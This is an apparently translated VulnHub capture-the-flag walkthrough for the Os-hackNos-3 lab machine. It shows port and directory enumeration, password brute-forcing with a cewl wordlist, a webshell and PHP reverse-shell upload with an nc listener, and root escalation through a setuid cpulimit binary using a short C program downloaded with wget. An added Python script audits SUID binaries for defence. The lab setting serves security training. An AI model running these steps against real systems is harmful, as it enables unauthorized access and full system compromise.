VulnHub machine walkthrough: Os-hackNos-3

(If you cannot see the images, it is because the GitHub image host is blocked; use a proxy or wait a while and they will show up.)

Release

Name: hackNos: Os-hackNos-3
Release date: 14 December 2019

Download

  • Download: https://drive.google.com/open?id=1zWTU6BFXPmS8BDeoVc766FwUJQZ4-_RT
  • Download (Mirror): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova
  • Download (Torrent): https://download.vulnhub.com/hacknos/Os-hackNos-3.ova.torrent

Description

Difficulty: Intermediate
Flags: 2 flags, the first is user.txt and the second is root.txt
Learning: web application, enumeration, privilege escalation
Website: www.hacknos.com
Contact: @rahul_gehlaut
It may work better in VirtualBox than in VMware

Motivation

The reason I thought of doing this box is that 暗月 said he had searched the whole internet and could not escalate privileges on it, so I humbly gave it a try... :)

Information gathering

Start with nmap

```
root@kali:~# nmap -sn -v 192.168.56.0/24
Nmap scan report for 192.168.56.105
Host is up (0.00022s latency).
MAC Address: 08:00:27:CF:65:22 (Oracle VirtualBox virtual NIC)
```
```
root@kali:~# nmap -p- -v -sV -Pn 192.168.56.105
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
```
```
root@kali:~# nmap -p 22,80 -Pn -sV -A -T5 -v --script=vuln 192.168.56.105
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_ /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.41 (ubuntu)'
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
```

Not much useful information here. The files under /scripts/ show a ticketing system built on osTicket, and dirb did not turn up much of value either.

```
root@kali:~# dirb http://192.168.56.105/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Dec 30 21:46:55 2019
URL_BASE: http://192.168.56.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.105/ ----
+ http://192.168.56.105/index.html (CODE:200|SIZE:195)
==> DIRECTORY: http://192.168.56.105/scripts/
+ http://192.168.56.105/server-status (CODE:403|SIZE:279)
```

Time to bring out the big gun, dirbuster.

My machine is powerful enough to run 500 threads without strain :)

Two sensitive directories were found, /websec and /devil; only the CMS under /websec is of any use.

Brute-forcing the CMS admin password

Use cewl to crawl the /websec/ page and build a password wordlist (a hint from the machine's author).

```
root@kali:~# cewl http://192.168.56.105/websec/ > oshacknos3.txt
root@kali:~# cat oshacknos3.txt
CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
hackNos
Bootstrap
and
com
Start
www
JavaScript
Navigation
About
Services
Portfolio
Contact
Security
Find
Out
More
Securityx
has
everything
you
need
get
your
new
website
running
time
All
the
templates
themes
are
open
source
free
download
easy
use
strings
attached
Get
Started
Your
Service
contact
hacknos
core
Plugin
Custom
scripts
for
this
template
```

Use contact@hacknos.com as the username; either hydra or burp works for brute-forcing the password. After getting into the admin panel, it turns out the password was Securityx, taken straight from the home page.

Getting a shell

Go to the page shown in the figure below, open the .htaccess file, delete all of its contents and click save. If it is not deleted, the shell uploaded later cannot be accessed.

As shown below, the 冰蝎 (Behinder) webshell is uploaded successfully.

Connect to it directly and upload php-reverse-shell.php.

Start a listener on the kali side, then visit the shell; a reverse shell comes back.

```
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.56.105: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 53620
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:34:52 up 2:04, 0 users, load average: 0.00, 0.00, 0.33
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@hacknos:/$ whoami
whoami
www-data
```

Privilege escalation

A box that 暗月 said could not be rooted after searching the whole internet... I was very curious just how hard it really is. Read on.

Checked the SUID executables; nothing usable.

```
www-data@hacknos:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/cpulimit
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/chsh
```
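From the defender's side, the interesting thing about that list is that one entry is not a setuid binary a stock install ships. The script below is an added example, not code from the write-up: it compares find-style output against an assumed baseline of stock Ubuntu setuid binaries (STOCK_SUID, not exhaustive), can do the same walk on a live filesystem, and emits the chmod commands that would remove the bit.

```python
# Added example (not from the write-up): audit setuid binaries against a
# baseline. STOCK_SUID is an assumed, non-exhaustive list of setuid binaries
# a stock Ubuntu install ships; FIND_OUTPUT is the find output quoted above.
import os
import stat

STOCK_SUID = {
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/su", "/usr/bin/sudo",
    "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/newgrp",
    "/usr/bin/gpasswd", "/usr/bin/fusermount", "/usr/bin/at", "/usr/bin/pkexec",
}

FIND_OUTPUT = """\
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/cpulimit
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/chsh
"""

def unexpected_suid(find_output, baseline=STOCK_SUID):
    """Return setuid paths from find-style output that are not in the baseline."""
    paths = [ln.strip() for ln in find_output.splitlines() if ln.strip()]
    return sorted(p for p in paths if p not in baseline)

def scan_suid(root="/"):
    """Live equivalent of `find / -perm -u=s -type f`; lstat so symlinks are skipped."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished entry
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found

def remediation(paths):
    """Commands an admin would run to drop the setuid bit from flagged files."""
    return ["chmod u-s " + p for p in paths]
```

On this box `unexpected_suid(FIND_OUTPUT)` returns only /usr/bin/cpulimit, which is exactly the binary the rest of the write-up turns on; `unexpected_suid("\n".join(scan_suid()))` runs the same check on a live host.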

A search on GTFOBins showed that the cpulimit binary below can be used for privilege escalation.

```
www-data@hacknos:/$ sudo cpulimit -l 100 -f /bin/sh
sudo cpulimit -l 100 -f /bin/sh
[sudo] password for www-data:
```

Failed... Then I tried all kinds of exp, poc and scripts, plus other escalation methods; after all of them failed, I had no choice but to track down the author and ask him.

The author's answer was to escalate via docker, referring to his blog post docker Privilege Escalation Linux.

However, when I followed the method in that post I was still told the current user www-data has insufficient permissions; checking the blackdevil user's permissions showed that it does have docker rights.

I then spent a lot of time trying to brute-force blackdevil's password and looking for hashes from the shell, to no avail... I asked the author again and got no reply.

So I had to ask the vulnhub experts on discord, and was lucky enough to get a reply from pwn4magic.

He told me to first write a C program on kali, compile it, put the resulting binary on the target with 777 permissions, then run it together with cpulimit. The specific steps are as follows.

C program source:

```c
#include <stdio.h>
#include <stdlib.h>     /* declares system(); without it gcc warns about an implicit declaration */
#include <unistd.h>
#include <sys/types.h>

int main(void)
{
    /* run as the setuid-root parent's effective uid: make real uid/gid 0 too, then drop into a shell */
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
```

After compiling, move it to the target

```
root@kali:~# gcc luci11.c -o exp
luci11.c: In function ‘main’:
luci11.c:9:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
9 | system("/bin/bash");
| ^~~~~~
root@kali:~# python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
```
```
www-data@hacknos:/tmp$ wget http://192.168.56.102:8000/exp
wget http://192.168.56.102:8000/exp
--2019-12-31 05:37:05-- http://192.168.56.102:8000/exp
Connecting to 192.168.56.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16720 (16K) [application/octet-stream]
Saving to: ‘exp’

exp 100%[===================>] 16.33K --.-KB/s in 0s

2019-12-31 05:37:05 (130 MB/s) - ‘exp’ saved [16720/16720]

www-data@hacknos:/tmp$ chmod 777 exp
chmod 777 exp
www-data@hacknos:/tmp$ ls -la
ls -la
total 28
drwxrwxrwt 2 root root 4096 Dec 31 05:37 .
drwxr-xr-x 20 root root 4096 Dec 10 18:05 ..
-rwxrwxrwx 1 www-data www-data 16720 Dec 31 2019 exp
```

Finally, run the command below to escalate

```
www-data@hacknos:/tmp$ cpulimit -l 100 -f ./exp
cpulimit -l 100 -f ./exp
Process 2800 detected
root@hacknos:/tmp# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@hacknos:/tmp# whoami
whoami
root
```

Privilege escalation succeeded, simply awesome...
Got the flag, root.txt....

```
root@hacknos:/tmp# cd /root
cd /root
root@hacknos:/root# ls
ls
root.txt snap
root@hacknos:/root# cat root.txt
cat root.txt
######## ##### ##### ######## ########
## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ##
######## ## ## ## ## ## ########
## ## ## ## ## ## ## ## ##
## ## ## ## ## ## ## ## ##
## ## ##### ##### ## ####### ## ##


MD5-HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

Blog: www.hackNos.com

Linkedin: https://in.linkedin.com/in/rahulgehlaut
```

With that, the challenge is complete...
First published here, publication date: 31 December 2019

  • e.g. for Linux SUID privilege escalation, see Linux Privilege Escalation using SUID Binaries, a step-by-step tutorial.

  • Finally, here is the write-up by the Os-hackNos-3 author Rahul Gehlaut, OS-hackNos-3 Walkthrough Vulnhub CTF. If you can get into the blackdevil account, you can also use the docker privilege escalation method mentioned in the earlier post.

Game over

Sorry, this time I still could not find the Greek expert's foolproof one-click script. I am so sorry about this… It's a pity…

The end, to be continued…